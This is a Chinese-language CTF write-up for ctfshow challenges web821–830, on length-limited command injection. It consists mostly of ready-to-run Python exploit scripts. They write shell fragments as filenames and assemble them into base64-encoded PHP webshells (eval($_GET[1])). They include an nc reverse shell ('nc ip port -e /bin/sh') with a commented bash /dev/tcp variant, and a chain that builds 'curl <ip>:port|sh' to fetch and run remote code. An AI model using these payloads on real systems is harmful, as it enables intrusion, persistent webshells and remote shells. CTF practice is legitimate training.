当前位置:网站首页>CTFSHOW 常用姿势篇(821-830)

CTFSHOW 常用姿势篇(821-830)

2022-06-13 04:20:00 yu22x

文章目录

这一部分我就是一个脚本搬运工了。

web821

可以看下这篇文章
https://www.cnblogs.com/-chenxs/p/11981586.html
这种限制长度的可以通过将想要使用的命令作为文件名进行创建,接着按时间排序写入到另一个文件中ls -t >0
最后执行0即可sh 0
用下群主在vip群发的脚本

import requests
import time

url = "http://ddfe46fa-fa05-4675-bb00-537e95a0f936.challenge.ctf.show/"

payload=[
">hp",
">1.p\\",
">d\\>\\",
">\\ -\\",
">e64\\",
">bas\\",
">7\\|\\",
">XSk\\",
">Fsx\\",
">dFV\\",
">kX0\\",
">bCg\\",
">XZh\\",
">AgZ\\",
">waH\\",
">PD9\\",
">o\\ \\",
">ech\\",
"ls -t>0",
". 0"
]
def writeFile(payload):
	data={
    
	"cmd":payload
	}
	requests.post(url,data=data)

def run():
	for p in payload:
		writeFile(p.strip())
		print("[*] create "+p.strip())
		time.sleep(1)

def check():
	response = requests.get(url+"1.php")
	if response.status_code == requests.codes.ok:
		print("[*] Attack success!!!Webshell is "+url+"1.php")

def main():
	run()
	check()

	


if __name__ == '__main__':
	main()

写入的文件内容为<?php eval($_GET[1]);

web822

web目录不可写,所以将文件写入到临时文件中,然后执行该文件。
不过在无数字字母中有种方法可以在这个地方使用。

#coding:utf-8
#author yu22x
import requests
url="http://dbea52c2-0b83-4770-972d-7adde3dc1677.challenge.ctf.show/"
#files={'file':'bash -i >& /dev/tcp/ip/port 0>&1'}
files={
    'file':'nc ip port -e /bin/sh'}
r= requests.post(url,files=files,data={
    'cmd':'. /t*/*'})
html = r.text
print(html)

bash反弹没成功用的nc反弹。

web 823|824

不得不佩服群主的脑洞
首先看下payload

payload=[
">grep",
">h",
"*>j",
"rm g*",
"rm h*",
">cat",
"*>>i",
"rm c*",
"rm j",
">cp",
"*"
]

写入grep h
接着执行* > j
实际执行的是grep h index.php
得到的是index.php所有带h的行,结果如下

<?php
# @Author: h1xa
# @Last Modified by: h1xa
# @email: [email protected]
# @link: https://ctfer.com
highlight_file(__FILE__);
    shell_exec($cmd);

接着将j中的内容添加到index.php后面并且写入到i中
cat * >> i*
最后将i的copy到index.php中。
不过适用的情况不多,需要最终调用的命令带h或者p。

# @Author: h1xa
import requests
import time

url = "http://6763f093-a4c6-48a8-9740-018b234da289.challenge.ctf.show/"

payload=[
">grep",
">h",
"*>j",
"rm g*",
"rm h*",
">cat",
"*>>i",
"rm c*",
"rm j",
">cp",
"*"
]

def writeFile(payload):
	data={
    
	"cmd":payload
	}
	requests.post(url,data=data)

def run():
	for p in payload:
		writeFile(p.strip())
		print("[*] create "+p.strip())
		time.sleep(0.3)
	print("[*] Attack success!!!Webshell is "+url)

def main():
	run()

if __name__ == '__main__':
	main()

web825

原理类似于821,不过因为长度短了会出现相同的文件名,比如空格,可能会有多个地方使用,但是只会生成一个。
所以需要把空格改成${IFS}。最后还有一个问题,我们之前用的ls -t>0长度超过了5所以得想个其他方法。
这里用的是利用dir,
dir a b >c 会将ab写入到c文件中。
具体原理可参考https://www.sohu.com/a/208155480_354899

# -*- coding: utf-8 -*-
# @Author: h1xa
# @Date: 2022-05-06 13:25:41
# @Last Modified by: h1xa
# @Last Modified time: 2022-05-10 20:55:42
# @email: [email protected]
# @link: https://ctfer.com


import requests
import time

url = "http://eb893c73-86c3-449f-98fe-0f82d9212110.challenge.ctf.show/"

payload = [
'>sl',
'>kt-',
'>j\\>',
'>j\\#',
'>dir',
'*>v',
'>rev',
'*v>x',
'>php',
'>a.\\',
'>\\>\\',
'>-d\\',
'>\\ \\',
'>64\\',
'>se\\',
'>ba\\',
'>\\|\\',
'>4=\\',
'>Pz\\',
'>k7\\',
'>XS\\',
'>sx\\',
'>VF\\',
'>dF\\',
'>X0\\',
'>gk\\',
'>bC\\',
'>Zh\\',
'>ZX\\',
'>Ag\\',
'>aH\\',
'>9w\\',
'>PD\\',
'>S}\\',
'>IF\\',
'>{\\',
'>\\$\\',
'>ho\\',
'>ec\\',
'sh x',
'sh j'
]

def writeFile(payload):
	data={
    
	"cmd":payload
	}
	requests.post(url,data=data)

def run():
	for p in payload:
		writeFile(p.strip())
		print("[*] create "+p.strip())
		time.sleep(0.3)

def check():
	response = requests.get(url+"a.php")
	if response.status_code == requests.codes.ok:
		print("[*] Attack success!!!Webshell is "+url+"a.php")

def main():
	run()
	check()

if __name__ == '__main__':
	main()

web826

# -*- coding: utf-8 -*-
# @Author: h1xa
# @Date: 2022-05-06 13:25:41
# @Last Modified by: h1xa
# @Last Modified time: 2022-05-10 20:55:58
# @email: [email protected]
# @link: https://ctfer.com


import requests
import time

url = "http://d6373b16-848d-4656-9a30-d1fbb18d8678.challenge.ctf.show/"
#url="http://101.34.94.44/aaa/index.php"

payload = [
'>\\ \\',
'>-t\\',
'>\\>a',
'>ls\\',
'ls>v',
'>mv',
'>vt',
'*v*',
'>ls',
'l*>t',
'>cat',
'*t>z',

#这个地方的ip是用的10进制,因为用普通的ip地址存在多个点号。
#可以用这个网站转https://tool.520101.com/wangluo/jinzhizhuanhuan/
'>sh',
'>\\|\\',
'>00\\',
'>80\\',
'>\\:\\',
'>48\\',
'>11\\',
'>75\\',
'>96\\',
'>16\\',
'>\\ \\',
'>rl\\',
'>cu\\',

'sh z',
'sh a',
]
def writeFile(payload):
	data={
    
	"cmd":payload
	}
	requests.post(url,data=data)

def run():
	for p in payload:
		writeFile(p.strip())
		print("[*] create "+p.strip())
		time.sleep(1)

def check():
	response = requests.get(url+"1.php")
	if response.status_code == requests.codes.ok:
		print("[*] Attack success!!!Webshell is "+url+"1.php")

def main():
	run()
	check()

if __name__ == '__main__':
	main()

web827

# -*- coding: utf-8 -*-
# @Author: h1xa
# @Date: 2022-05-06 13:25:41
# @Last Modified by: h1xa
# @Last Modified time: 2022-05-10 20:56:17
# @email: [email protected]
# @link: https://ctfer.com


import requests
import time

url = "http://ab1290cc-c3f0-4ff2-b864-a4388d4331a6.challenge.ctf.show/"

payload = [
'>\\ \\',
'>-t\\',
'>\\>a',
'>ls\\',
'ls>v',
'>mv',
'>vt',
'*v*',
'>ls',
'l*>t',
'>cat',
'*t>z',

'>php',
'>a.\\',
'>\\>\\',
'>-d\\',
'>\\ \\',
'>64\\',
'>se\\',
'>ba\\',
'>\\|\\',
'>4=\\',
'>Pz\\',
'>k7\\',
'>XS\\',
'>sx\\',
'>VF\\',
'>dF\\',
'>X0\\',
'>gk\\',
'>bC\\',
'>Zh\\',
'>ZX\\',
'>Ag\\',
'>aH\\',
'>9w\\',
'>PD\\',
'>S}\\',
'>IF\\',
'>{\\',
'>\\$\\',
'>ho\\',
'>ec\\',


'sh z',
'sh a'
]

def writeFile(payload):
	data={
    
	"cmd":payload
	}
	requests.post(url,data=data)

def run():
	for p in payload:
		writeFile(p.strip())
		print("[*] create "+p.strip())
		time.sleep(1)

def check():
	response = requests.get(url+"a.php")
	if response.status_code == requests.codes.ok:
		print("[*] Attack success!!!Webshell is "+url+"a.php")

def main():
	run()
	check()

if __name__ == '__main__':
	main()

web828

网上有现成的payload
https://juejin.cn/post/7069307571483443231

原网站

版权声明
本文为[yu22x]所创,转载请带上原文链接,感谢
https://blog.csdn.net/miuzzx/article/details/125148989

边栏推荐

猜你喜欢

随机推荐